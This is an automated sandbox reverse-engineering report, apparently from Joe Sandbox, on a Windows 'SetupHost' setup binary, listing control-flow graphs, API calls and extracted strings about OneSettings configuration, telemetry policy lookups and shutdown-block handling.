                                                                                                                                                                                                                control_flow_graph 288 9ba6c1-9ba793 call a0f3e6 291 9ba7ac-9ba7c7 call 9bc419 288->291 292 9ba795-9ba7a4 call 9b8a19 288->292 297 9ba7c9 291->297 298 9ba7e2-9ba7fb call 9bc159 291->298 295 9ba7a9 292->295 295->291 300 9ba7ce-9ba7d1 297->300 303 9ba808-9ba810 298->303 304 9ba7fd-9ba806 298->304 302 9ba7d3-9ba7dd call 9b8ab5 300->302 309 9bae05-9bae27 call 9b9d9c call 9aee5d 302->309 306 9ba829-9ba834 303->306 307 9ba812-9ba81b call 9b8a19 303->307 304->302 311 9ba887 306->311 312 9ba836-9ba83b 306->312 314 9ba820-9ba826 307->314 330 9bae29-9bae32 call 9b9b21 309->330 331 9bae38-9bae44 309->331 313 9ba88c-9ba88e 311->313 315 9ba841-9ba84e 312->315 317 9ba89a-9ba8be call 9a1bc9 313->317 318 9ba890-9ba895 313->318 314->306 315->315 319 9ba850-9ba858 315->319 327 9ba8ca-9ba8d2 317->327 328 9ba8c0-9ba8c5 317->328 318->300 319->311 322 9ba85a-9ba87f call a08732 319->322 322->318 338 9ba881-9ba885 322->338 336 9ba8eb-9ba902 call 9bc419 327->336 337 9ba8d4-9ba8dd call 9b8a19 327->337 335 9badf3 328->335 330->331 333 9bae46-9bae4f call 9b9b21 331->333 334 9bae55-9bae61 331->334 333->334 341 9bae63-9bae6c call 9b9b21 334->341 342 9bae72-9bae7e 334->342 343 9badf5-9badfa call 9b8ab5 335->343 356 9ba917-9ba930 call 9bb1d4 336->356 357 9ba904 336->357 349 9ba8e2-9ba8e8 337->349 338->313 341->342 350 9bae8f-9bae9b 342->350 351 9bae80-9bae89 call 9b9b21 342->351 354 9badff 343->354 349->336 358 9bae9d-9baea6 call 9b9b21 350->358 359 9baeac-9baeb2 350->359 351->350 354->309 370 9ba97b-9ba994 call 9bb1d4 356->370 371 9ba932-9ba93c 356->371 365 9ba909-9ba90f 357->365 358->359 362 9baec5 359->362 363 9baeb4-9baec3 call 9b9b21 359->363 369 9baec7-9baed3 362->369 363->369 365->356 373 9baee2-9baeee 369->373 374 9baed5-9baedc call 9b9b21 369->374 394 9ba9e2-9baa1f memset RtlGetVersion call 9b9ca1 370->394 395 9ba996-9ba9a0 370->395 375 9ba93e-9ba94e call 9b8a19 371->375 376 9ba956-9ba972 call 9bc419 371->376 378 9baefd-9baf03 373->378 379 9baef0-9baef7 call 9b9b21 373->379 374->373 391 9ba953 375->391 376->370 402 9ba974-9ba979 376->402 381 9baf12-9baf1e 378->381 382 9baf05-9baf0c call 9b9b21 378->382 379->378 389 9baf2b-9baf4d call 9bb721 call 9aee5d call a0f3a4 381->389 390 9baf20-9baf25 call 9b9b21 381->390 382->381 390->389 391->376 411 9baa31-9baa56 GetProductInfo 394->411 412 9baa21-9baa27 394->412 396 9ba9ba-9ba9d6 call 9bc419 395->396 397 9ba9a2-9ba9b2 call 9b8a19 395->397 396->394 413 9ba9d8-9ba9dd 396->413 408 9ba9b7 397->408 402->365 408->396 415 9baadf-9baaf8 call 9bb1d4 411->415 416 9baa5c-9baa83 call 9a1bc9 411->416 412->411 413->365 425 9baafa-9bab04 415->425 426 9bab40-9bab59 call 9bb1d4 415->426 423 9baaa1-9baaa9 416->423 424 9baa85-9baa9c call 9b8ab5 416->424 430 9baaab-9baab4 call 9b8a19 423->430 431 9baac2-9baad3 call 9bc419 423->431 424->309 427 9bab1e-9bab34 call 9bc419 425->427 428 9bab06-9bab16 call 9b8a19 425->428 443 9bab5b-9bab65 426->443 444 9baba1-9babb0 call 9fe6d5 426->444 427->426 446 9bab36 427->446 439 9bab1b 428->439 441 9baab9-9baabf 430->441 431->415 447 9baad5 431->447 439->427 441->431 448 9bab7f-9bab95 call 9bc419 443->448 449 9bab67-9bab7c call 9b8a19 443->449 454 9babbc-9babec call 9a1bc9 444->454 455 9babb2 444->455 446->426 447->415 448->444 457 9bab97 448->457 449->448 460 9babf8-9bac12 call 9b93b4 454->460 461 9babee 454->461 455->454 457->444 464 9bac1e-9bac37 call 9bb1d4 460->464 465 9bac14 460->465 461->460 468 9bac39-9bac61 call 9bb721 call 9b93b4 464->468 469 9bac6d-9bac83 464->469 465->464 468->469 486 9bac63 468->486 471 9bac96-9bac9e 469->471 472 9bac85-9bac8c 469->472 473 9bacd2-9bacd4 471->473 474 9baca0-9baca2 471->474 472->471 478 9bacde 473->478 479 9bacd6-9bacdc 473->479 476 9bacaa 474->476 477 9baca4-9baca8 474->477 481 9bacac-9bacc4 call 9b8a19 476->481 477->481 482 9bace0-9bad33 _wtoi * 4 call 9bc50b 478->482 479->482 487 9bacc9-9baccf 481->487 489 9bad3f-9bad4e call 9fe7c8 482->489 490 9bad35 482->490 486->469 487->473 493 9bad5a-9bad73 call 9bb1d4 489->493 494 9bad50 489->494 490->489 497 9badad 493->497 498 9bad75-9bad94 call 9bf6d6 call 9b8af9 493->498 494->493 500 9badb3-9badbd 497->500 498->500 511 9bad96-9badab 498->511 502 9badbf-9badca call 9b8a19 500->502 503 9badd2-9bade3 call 9bc419 500->503 507 9badcf 502->507 503->354 510 9bade5-9badf0 503->510 507->503 510->335 511->343
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009BA9F1
                                                                                                                                                                                                                • RtlGetVersion.NTDLL ref: 009BAA0A
                                                                                                                                                                                                                • GetProductInfo.KERNEL32 ref: 009BAA4E
                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 009BA6CB
                                                                                                                                                                                                                  • Part of subcall function 009B8A19: __EH_prolog3.LIBCMT ref: 009B8A20
                                                                                                                                                                                                                  • Part of subcall function 009BC159: __EH_prolog3_GS.LIBCMT ref: 009BC163
                                                                                                                                                                                                                  • Part of subcall function 009BC159: memset.MSVCRT ref: 009BC188
                                                                                                                                                                                                                  • Part of subcall function 009BB1D4: RegQueryValueExW.KERNEL32 ref: 009BB216
                                                                                                                                                                                                                  • Part of subcall function 009BB1D4: GetProcessHeap.KERNEL32(00000000,?), ref: 009BB237
                                                                                                                                                                                                                  • Part of subcall function 009BB1D4: HeapAlloc.KERNEL32(00000000), ref: 009BB23E
                                                                                                                                                                                                                  • Part of subcall function 009BB1D4: GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 009BB29E
                                                                                                                                                                                                                  • Part of subcall function 009BB1D4: HeapFree.KERNEL32(00000000), ref: 009BB2A5
                                                                                                                                                                                                                  • Part of subcall function 009BB1D4: RegCloseKey.KERNEL32(00000000), ref: 009BB2B4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$H_prolog3_Processmemset$AllocCloseFreeH_prolog3InfoProductQueryValueVersion
                                                                                                                                                                                                                • String ID: %d.%d.%d.%d$%lu$CMoSetupOneSettingsHelperT<class CEmptyType>::AddQueryStringParameters$EditionId$InstallationType$MachineId$OneSettings: AppVer [%s.%s.%s.%s]$OneSettings: Branch [%s]$OneSettings: DeviceId [%s]$OneSettings: EditionId [%s]$OneSettings: InstallationType [%s]$OneSettings: OS [%s]$OneSettings: OsVer [%s]$OneSettings: Ring [%s]$OneSettings: ScenarioId [%s]$OneSettings: Sku [%s]$OneSettingsBranch$OneSettingsVersion$Ring$SOFTWARE\Microsoft\SQMClient$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Microsoft\WindowsSelfHost\Applicability$SYSTEM\Setup\MoSetup$appBuildLab$deviceId$osver$platformEdition$platformInstallationType$ring$scenarioId$sku$windows
                                                                                                                                                                                                                • API String ID: 3255902165-1952152101
                                                                                                                                                                                                                • Opcode ID: 905bdb4a00979103539ef83d94f6f5cdb1c549bc6de88ecb81e44e35eff80251
                                                                                                                                                                                                                • Instruction ID: 4aebf593ddd1ab652ffc984fe32132eb2de95bb9b26942ecf6093a8c1d2f69ee
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 905bdb4a00979103539ef83d94f6f5cdb1c549bc6de88ecb81e44e35eff80251
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E329370B003199BDF21EFA4CE95BEE77B5AF88314F1040E9E509A7292EB749E40DB51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 512 9aafd5-9ab014 call a0f3b3 515 9ab073-9ab07f 512->515 516 9ab016-9ab022 512->516 521 9ab0a2-9ab0a9 515->521 522 9ab081-9ab09f call 9b8a19 515->522 523 9ab024-9ab03d call 9b8a19 516->523 524 9ab045-9ab05d GetProcessHeap HeapAlloc 516->524 521->524 527 9ab0ab-9ab0d6 call 9b8ab5 521->527 522->521 544 9ab042 523->544 525 9ab0d8 524->525 526 9ab05f-9ab071 524->526 528 9ab0da-9ab0e4 call 9ba0e8 525->528 526->528 548 9ab129-9ab140 527->548 537 9ab0ea 528->537 538 9ab0e6-9ab0e8 528->538 542 9ab0ec-9ab0f8 537->542 538->542 546 9ab0fe-9ab11a 542->546 547 9ab1bc-9ab1d3 call 9b7fb1 542->547 544->524 554 9ab11c-9ab11e call 9b8ab5 546->554 558 9ab1d8-9ab201 call 9b836f 547->558 559 9ab142-9ab15b 548->559 560 9ab160-9ab16e call 9b9d9c 548->560 561 9ab123 554->561 570 9ab203 558->570 571 9ab221-9ab229 558->571 559->560 568 9ab179-9ab17d 560->568 569 9ab170-9ab173 SysFreeString 560->569 565 9ab126 561->565 565->548 572 9ab188-9ab18a 568->572 573 9ab17f-9ab182 SysFreeString 568->573 569->568 574 9ab208-9ab216 570->574 575 9ab22b-9ab230 571->575 576 9ab232-9ab241 571->576 577 9ab18c-9ab18d SysFreeString 572->577 578 9ab193-9ab195 572->578 573->572 587 9ab21a-9ab21c 574->587 575->574 588 9ab243-9ab24c 576->588 589 9ab275-9ab279 576->589 577->578 580 9ab19e-9ab1a3 578->580 581 9ab197-9ab198 SysFreeString 578->581 583 9ab1ac-9ab1bb call 9ba0e8 call a0f390 580->583 584 9ab1a5-9ab1a6 SysFreeString 580->584 581->580 584->583 587->554 591 9ab24e 588->591 592 9ab253-9ab272 call 9b8a19 588->592 589->561 594 9ab27f-9ab29e call 9b9d9c call 9b82e4 589->594 591->592 592->589 602 9ab2c0-9ab2c9 594->602 603 9ab2a0-9ab2a7 594->603 606 9ab379-9ab38e call 9b83fa 602->606 607 9ab2cf-9ab2e1 call 9b8477 602->607 605 9ab2aa-9ab2bb 603->605 605->587 614 9ab39f-9ab3b1 call 9b83fa 606->614 615 9ab390-9ab399 606->615 616 9ab2f2-9ab304 call 9b858f 607->616 617 9ab2e3-9ab2ec 607->617 625 9ab3c2-9ab3d4 call 9b858f 614->625 626 9ab3b3-9ab3bc 614->626 615->614 623 9ab33b-9ab34d call 9b858f 616->623 624 9ab306-9ab327 call 9b7c36 616->624 617->616 623->606 637 9ab34f-9ab370 call 9b7c36 623->637 633 9ab338-9ab33a 624->633 634 9ab329 624->634 635 9ab422 625->635 636 9ab3d6-9ab3f6 call 9b7c36 625->636 626->625 633->623 639 9ab32e-9ab333 634->639 638 9ab425-9ab42c 635->638 636->638 648 9ab3f8-9ab41d call 9b8ab5 636->648 637->606 649 9ab372-9ab377 637->649 642 9ab42e-9ab440 call 9b8477 638->642 643 9ab455-9ab467 call 9b83fa 638->643 639->605 642->643 652 9ab442-9ab44f 642->652 653 9ab469-9ab476 643->653 654 9ab47c-9ab48e call 9b83fa 643->654 648->565 649->639 652->643 653->654 659 9ab4a3-9ab4b5 call 9b83fa 654->659 660 9ab490-9ab49d 654->660 665 9ab4ca-9ab4dc call 9b83fa 659->665 666 9ab4b7-9ab4c4 659->666 660->659 669 9ab4de-9ab4eb 665->669 670 9ab4f1-9ab503 call 9b83fa 665->670 666->665 669->670 673 9ab518-9ab52a call 9b83fa 670->673 674 9ab505-9ab512 670->674 677 9ab53f-9ab546 673->677 678 9ab52c-9ab539 673->678 674->673 679 9ab57b-9ab582 677->679 680 9ab548-9ab55a call 9b8477 677->680 678->677 682 9ab588-9ab59a call 9b83fa 679->682 683 9ab611-9ab618 679->683 680->679 690 9ab55c-9ab575 680->690 682->683 697 9ab59c-9ab5a5 682->697 686 9ab61a-9ab62c call 9b8477 683->686 687 9ab641-9ab648 683->687 686->687 698 9ab62e-9ab63b 686->698 688 9ab64a-9ab65c call 9b8477 687->688 689 9ab671-9ab678 687->689 688->689 704 9ab65e-9ab66b 688->704 695 9ab67a-9ab68c call 9b8477 689->695 696 9ab6a1-9ab6a8 689->696 690->679 695->696 709 9ab68e-9ab69b 695->709 696->565 703 9ab6ae-9ab6c0 call 9b83fa 696->703 701 9ab5ac-9ab5b3 697->701 702 9ab5a7-9ab5aa 697->702 698->687 706 9ab5d3-9ab5e7 701->706 707 9ab5b5-9ab5bc 701->707 702->701 702->706 703->565 712 9ab6c6-9ab6d9 703->712 704->689 715 9ab5e9-9ab60b call 9b8a19 706->715 716 9ab60e 706->716 707->706 710 9ab5be-9ab5d1 707->710 709->696 710->683 712->565 715->716 716->683
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009AAFDC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0000001C), ref: 009AB049
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009AB050
                                                                                                                                                                                                                  • Part of subcall function 009B8A19: __EH_prolog3.LIBCMT ref: 009B8A20
                                                                                                                                                                                                                  • Part of subcall function 009B858F: __EH_prolog3.LIBCMT ref: 009B8596
                                                                                                                                                                                                                  • Part of subcall function 009B858F: SysFreeString.OLEAUT32(00000000), ref: 009B86B4
                                                                                                                                                                                                                  • Part of subcall function 009B858F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B86C1
                                                                                                                                                                                                                  • Part of subcall function 009B858F: HeapFree.KERNEL32(00000000), ref: 009B86C8
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009AB173
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009AB182
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009AB18D
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009AB198
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009AB1A6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Free$String$Heap$H_prolog3$Process$Alloc
                                                                                                                                                                                                                • String ID: COMPACTOSENABLED$CSetupHost::InitializeOneSettings$DIAGNOSTICANALYSISENABLED$DIAGNOSTICANALYSISTIMEOUT$DOWNLOADFREESPACEPADDING$DOWNLOADFREESPACEREQUIRED$DUCATEGORIES_FLAG$DUCHANNELS_FLAG$EXTERNALFREESPACEPADDING$EXTERNALFREESPACEREQUIRED$FACILITATORURL$MIGNEOENABLED$MIGROLLBACKENABLED$POSTUPGRADEFREESPACEPERCENTAGE$POSTUPGRADEFREESPACEREQUIRED$PRIORITYLEVEL$SetupHost: Attempting to initialize OneSettings values$SetupHost: Ignoring priority setting.$SetupHost: OneSettings Initialized -> [%s]$SetupHost: Skipping OneSettings initialization for Azure Host$UNINSTALLENABLED$UPDATEMEDIAENABLED$UPDATEMEDIAMCTLINK$UPDATEMEDIASETUPVERSION$Yes
                                                                                                                                                                                                                • API String ID: 3733136790-3700976932
                                                                                                                                                                                                                • Opcode ID: 650396aeb201875ad438d71496d00cb8713b79d9fbae6a0dd3373c676d5d5267
                                                                                                                                                                                                                • Instruction ID: 649d65e3d1b591b23805c715876aac65f8f8d26a49f3b8eb916061a087fe4367
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 650396aeb201875ad438d71496d00cb8713b79d9fbae6a0dd3373c676d5d5267
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2225074A002149FDF04DFA4C885BEEBBB9EF89714F14406AEC15AB396DF749841CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 721 a0aad9-a0ab0f LoadLibraryExW 722 a0ab31 721->722 723 a0ab11-a0ab2f GetProcAddress * 2 721->723 724 a0ab34-a0ab44 722->724 723->724 725 a0abb0-a0abc1 _wcsicmp 724->725 726 a0ab46-a0ab48 724->726 728 a0ac41-a0ac68 RegGetValueW 725->728 729 a0abc3-a0abd3 _wcsicmp 725->729 726->725 727 a0ab4a-a0ab74 726->727 738 a0ac7d-a0ac86 727->738 749 a0ab7a-a0ab7f 727->749 730 a0ac75 728->730 731 a0ac6a-a0ac73 728->731 732 a0abd5-a0abda 729->732 733 a0abdc-a0abec _wcsicmp 729->733 737 a0ac77 730->737 730->738 731->730 732->728 734 a0abf5-a0ac06 _wcsicmp 733->734 735 a0abee-a0abf3 733->735 734->728 739 a0ac08-a0ac19 _wcsicmp 734->739 735->728 737->738 740 a0ac96-a0ac98 738->740 741 a0ac88-a0ac8c 738->741 739->728 742 a0ac1b-a0ac2c _wcsicmp 739->742 744 a0acb6-a0acbb 740->744 745 a0ac9a-a0acaa 740->745 741->740 742->728 746 a0ac2e-a0ac3f _wcsicmp 742->746 747 a0acc4-a0acc6 744->747 748 a0acbd-a0acbe FreeLibrary 744->748 745->744 761 a0acac-a0acb1 call a0b9c5 745->761 746->728 750 a0ac8e-a0ac91 746->750 751 a0acd2-a0acd8 747->751 752 a0acc8-a0accd call a0b339 747->752 748->747 753 a0ab81-a0ab85 749->753 754 a0aba6-a0abab 749->754 750->740 752->751 757 a0ab87-a0ab8a 753->757 758 a0ab8f-a0ab95 753->758 754->740 757->740 758->754 760 a0ab97-a0aba1 758->760 760->740 761->744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(policymanager.dll,00000000,00000800,00000000,00000003,00000001,?,00A0ADCD,00000000,00000000,?,00000000,00A0B215), ref: 00A0AB02
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PolicyManager_GetPolicy,?,00A0ADCD,00000000,00000000,?,00000000,00A0B215), ref: 00A0AB17
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PolicyManager_FreeGetPolicyData,?,00A0ADCD,00000000,00000000,?,00000000,00A0B215), ref: 00A0AB26
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00A0ACBE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressLibraryProc$FreeLoad
                                                                                                                                                                                                                • String ID: AllowCommercialDataPipeline$AllowTelemetry$ConfigureTelemetryOptInChangeNotification$ConfigureTelemetryOptInSettingsUx$DisableDeviceDelete$DisableDiagnosticDataViewer$DisableTelemetryOptInChangeNotification$DisableTelemetryOptInSettingsUx$LimitEnhancedDiagnosticDataWindowsAnalytics$PolicyManager_FreeGetPolicyData$PolicyManager_GetPolicy$Software\Policies\Microsoft\Windows\DataCollection$System$policymanager.dll
                                                                                                                                                                                                                • API String ID: 2256533930-3128045802
                                                                                                                                                                                                                • Opcode ID: 170f5910a62e6da2f2b337ce02bcd7838b39afaa0ceb3d80e570772f8feab9ab
                                                                                                                                                                                                                • Instruction ID: 5c20c84506806ea61d072cfb530b8f9a9ab18d41ba933744af61119924eb5b55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 170f5910a62e6da2f2b337ce02bcd7838b39afaa0ceb3d80e570772f8feab9ab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67515B72905319EBDB158F98ED44BAE7BB4EF55361F158029F805E72C0DB309D018BA6
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 763 9a75c4-9a75dd 764 9a75e3 763->764 765 9a7826-9a782d 763->765 766 9a778a-9a7792 764->766 767 9a75e9-9a75ec 764->767 768 9a7833-9a7836 765->768 769 9a7a81-9a7a97 765->769 770 9a779d-9a77a8 766->770 771 9a7794-9a7797 766->771 772 9a75f2-9a75f5 767->772 773 9a7733-9a7746 767->773 774 9a79af-9a79c2 768->774 775 9a783c-9a783f 768->775 800 9a7ab9-9a7abb PostQuitMessage 769->800 801 9a7a99-9a7ab6 call 9b8a19 769->801 777 9a77aa-9a77b9 770->777 778 9a77f2-9a77fe 770->778 771->770 776 9a784a-9a785a DefWindowProcW 771->776 779 9a75fb-9a7601 772->779 780 9a76f3-9a7706 772->780 807 9a7748-9a7751 773->807 808 9a777d-9a7785 773->808 804 9a79e4-9a79f2 ShutdownBlockReasonCreate 774->804 805 9a79c4-9a79e1 call 9b8a19 774->805 782 9a78f4-9a7907 775->782 783 9a7845-9a7848 775->783 789 9a7ac3-9a7ac7 776->789 815 9a77db-9a77de 777->815 816 9a77bb 777->816 778->776 814 9a7800-9a7824 call 9b8a19 778->814 786 9a76ae-9a76c1 779->786 787 9a7607-9a760d 779->787 817 9a7708-9a7729 call 9b8a19 780->817 818 9a772c-9a772e 780->818 820 9a7929-9a7934 ShutdownBlockReasonDestroy 782->820 821 9a7909-9a7926 call 9b8a19 782->821 783->776 788 9a785f-9a7872 783->788 827 9a76c3-9a76e1 call 9b8a19 786->827 828 9a76e4-9a76ec call 9b8877 786->828 787->776 792 9a7613-9a7626 787->792 832 9a7894-9a789f 788->832 833 9a7874-9a7891 call 9b8a19 788->833 839 9a7628-9a7646 call 9b8a19 792->839 840 9a7649-9a7654 792->840 806 9a7ac1 800->806 801->800 822 9a7a31-9a7a39 GetLastError 804->822 823 9a79f4-9a7a07 804->823 805->804 806->789 824 9a7758-9a777a call 9b8a19 807->824 825 9a7753 807->825 808->789 814->776 835 9a77e1-9a77ed 815->835 831 9a77c0-9a77d8 call 9b8a19 816->831 817->818 818->789 836 9a7936-9a7949 820->836 837 9a7974-9a797c GetLastError 820->837 821->820 829 9a7a3b-9a7a3e 822->829 830 9a7a43-9a7a59 822->830 873 9a7a29-9a7a2c 823->873 874 9a7a09-9a7a26 call 9b8a19 823->874 824->808 825->824 827->828 855 9a76f1 828->855 829->830 830->806 896 9a7a5b-9a7a5e 830->896 831->815 848 9a78bd-9a78c9 832->848 849 9a78a1-9a78ad 832->849 833->832 835->806 888 9a796b-9a796f 836->888 889 9a794b-9a7968 call 9b8a19 836->889 844 9a797e-9a7981 837->844 845 9a7986-9a799c 837->845 839->840 853 9a7690-9a769c 840->853 854 9a7656-9a7662 840->854 844->845 845->806 908 9a79a2-9a79aa 845->908 848->806 905 9a78cf-9a78d4 848->905 849->815 902 9a78b3-9a78b8 849->902 853->806 918 9a76a2-9a76a9 853->918 916 9a7664-9a7682 call 9b8a19 854->916 917 9a7685-9a768b 854->917 855->818 873->806 874->873 888->806 889->888 909 9a7a63-9a7a7f call 9b8a19 896->909 902->831 915 9a78d5-9a78ef call 9b8a19 905->915 908->909 909->806 915->806 916->917 917->835 918->915
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,00000000,00000000,?,009A66B4,?,?,?), ref: 009A7854
                                                                                                                                                                                                                • ShutdownBlockReasonDestroy.USER32(?), ref: 009A792C
                                                                                                                                                                                                                • ShutdownBlockReasonCreate.USER32 ref: 009A79EA
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,009A66B4,?,?,?), ref: 009A7A31
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,009A66B4,?,?,?), ref: 009A7974
                                                                                                                                                                                                                  • Part of subcall function 009B8A19: __EH_prolog3.LIBCMT ref: 009B8A20
                                                                                                                                                                                                                • PostQuitMessage.USER32 ref: 009A7ABB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SetupUI: Calling ShutdownBlockReasonDestroy..., xrefs: 009A790B
                                                                                                                                                                                                                • FALSE, xrefs: 009A7753, 009A775B
                                                                                                                                                                                                                • SetupUI: Calling registered callback..., xrefs: 009A7666, 009A78B3
                                                                                                                                                                                                                • SetupUI: ShutdownBlockReasonDestroy succeeded!, xrefs: 009A794D
                                                                                                                                                                                                                • SetupUI: Button click detected - no registered callback., xrefs: 009A7802
                                                                                                                                                                                                                • SetupUI: Got a message from Store, xrefs: 009A7876
                                                                                                                                                                                                                • SetupUI: Got a message for session state change, xrefs: 009A762A
                                                                                                                                                                                                                • SetupUI: ShutdownBlockReasonCreate succeeded!, xrefs: 009A7A0B
                                                                                                                                                                                                                • TRUE, xrefs: 009A774C
                                                                                                                                                                                                                • SetupUI: ShutdownBlockReasonDestroy failed! Error: 0x%X, xrefs: 009A79A5
                                                                                                                                                                                                                • SYSTEM\Setup\MoSetup\Volatile, xrefs: 009A76E7
                                                                                                                                                                                                                • SetupUI: Calling ShutdownBlockReasonCreate..., xrefs: 009A79C6
                                                                                                                                                                                                                • SetupUI: Logging EndSession [0x%X] notification..., xrefs: 009A770D
                                                                                                                                                                                                                • SetupUI: Button click detected - calling registered callback..., xrefs: 009A77BB
                                                                                                                                                                                                                • SetupUI: ShutdownBlockReasonCreate failed! Error: 0x%X, xrefs: 009A7A5E
                                                                                                                                                                                                                • SetupUI: Got a timer message, xrefs: 009A76C5
                                                                                                                                                                                                                • SetupUI: Posting Quit Message..., xrefs: 009A7A9B
                                                                                                                                                                                                                • SetupUI: No registered callback., xrefs: 009A76A2, 009A78CF
                                                                                                                                                                                                                • SetupUI: Returning %s to QueryEndSession [0x%X] request..., xrefs: 009A775E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BlockErrorLastReasonShutdown$CreateDestroyH_prolog3MessagePostProcQuitWindow
